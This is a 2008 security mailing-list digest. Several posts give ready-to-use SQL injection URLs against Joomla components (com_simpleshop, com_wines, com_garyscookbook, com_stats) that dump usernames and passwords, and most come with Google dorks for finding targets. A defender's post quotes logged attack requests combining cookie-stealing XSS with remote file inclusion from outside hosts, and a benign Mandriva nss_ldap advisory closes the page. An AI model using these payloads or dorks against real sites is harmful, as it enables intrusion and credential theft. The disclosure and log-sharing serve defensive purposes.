joomla com_simpleshop SQL Injection(section) #

2008-02-25 Thread hackturkiye . hackturkiye
###

# 

#   joomla com_simpleshop SQL Injection(section)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl:"com_simpleshop"

# 

#  DORK 2 : allinurl: "com_simpleshop"section

#



   EXPLOIT : 


index.php?option=com_simpleshop&[EMAIL 
PROTECTED]&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





Re: Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management)

2008-02-25 Thread dcid
Hi list,


I am seeing scans for this in the "wild" now... As Dominique said, I don't know 
who would open up their SIM to the world, but better apply the patch

soon.


222.239.78.91 - - [22/Feb/2008:17:24:48 -0300] "GET 
/wiki//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://www.flagstaffsaloon.be/home/i?
 HTTP/1.1" 200 6792 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"


195.189.85.162 - - [23/Feb/2008:12:04:55 -0300] "GET 
/wiki/index.php//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://www.flagstaffsaloon.be/home/i?
 HTTP/1.1" 200 6605 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"


61.19.38.155 - - [23/Feb/2008:14:07:28 -0300] "GET 
//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://h1.ripway.com/durhaka/cmdasca.txt?
 HTTP/1.1" 200 6891 "-" "libwww-perl/5.803"



Thanks,


--

Daniel B. Cid

dcid ( at ) ossec.net


joomla com_wines SQL Injection(id)

2008-02-25 Thread hackturkiye . hackturkiye
###

# 

#   joomla com_wines  SQL Injection(id)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl:"com_wines"

# 

#  DORK 2 : allinurl: com_wines "detail"

#



   EXPLOIT : 


index.php?option=com_wines&[EMAIL 
PROTECTED]&func=detail&id=-000/**/union+select/**/0,0,password,null,null,null,null,null,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





joomla com_garyscookbook SQL Injection(id)

2008-02-25 Thread hackturkiye . hackturkiye
###

# 

#   joomla com_garyscookbook  SQL Injection(id)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl:"com_garyscookbook"

# 

#  DORK 2 : allinurl: com_garyscookbook "detail"

#



   EXPLOIT : 


index.php?option=com_garyscookbook&[EMAIL 
PROTECTED]&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





Joomla com_stat "id" Remote SQL Injection

2008-02-25 Thread no-reply
Aria-Security Team (Persian Security Network)

http://Aria-Security.Net

---

Shoutz : The-0utl4w, Sc0rp!on, mormoroth, Kinglet, iM4N, 

Joomla com_stat "id" Remote SQL Injection


index.php?option=com_stats&opt=viewteam&id=-10010111/**/union/**/select/**/username,password,3,4,5,6,7,8/**/from/**/jos_users/*


(Original Advisory@ http://forum.aria-security.net/showthread.php?p=1465)


AurA

Aria-Security Team

(Credits to Aria-Security Team)



[ MDVSA-2008:049 ] - Updated nss_ldap package fixes race condition allowing user data theft

2008-02-25 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:049
 http://www.mandriva.com/security/
 ___
 
 Package : nss_ldap
 Date: February 25, 2008
 Affected: 2007.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A race condition in nss_ldap, when used in applications that use
 pthread and fork after a call to nss_ldap, does not properly handle the
 LDAP connection, which might cause nss_ldap to return the wrong user
 data to the wrong process, giving one user access to data belonging
 to another user, in some cases.
 
 The updated package hais been patched to prevent this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5794
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 734883fd4974f083ac6005a56438754b  
2007.0/i586/nss_ldap-250-1.1mdv2007.0.i586.rpm 
 5f11443bb851c8c650c2aa1fa89743bd  
2007.0/SRPMS/nss_ldap-250-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 cdcf474742cdbeeb2d8c479a17270195  
2007.0/x86_64/nss_ldap-250-1.1mdv2007.0.x86_64.rpm 
 5f11443bb851c8c650c2aa1fa89743bd  
2007.0/SRPMS/nss_ldap-250-1.1mdv2007.0.src.rpm

 Corporate 4.0:
 f862188b3f2f11aa03f656dc29bee938  
corporate/4.0/i586/nss_ldap-239-3.2.20060mlcs4.i586.rpm 
 735c052491e2d3943be54bc93cc6fb29  
corporate/4.0/SRPMS/nss_ldap-239-3.2.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 01bc19f756541e2a34943255f75a7ca4  
corporate/4.0/x86_64/nss_ldap-239-3.2.20060mlcs4.x86_64.rpm 
 735c052491e2d3943be54bc93cc6fb29  
corporate/4.0/SRPMS/nss_ldap-239-3.2.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFHwn1vmqjQ0CJFipgRAhAEAJ9DWufRZ/a2TduRaXQjht/NgV5gnQCfVUZd
Ezp/2K3q5VsIlGN6wnLRNYs=
=U/Ma
-END PGP SIGNATURE-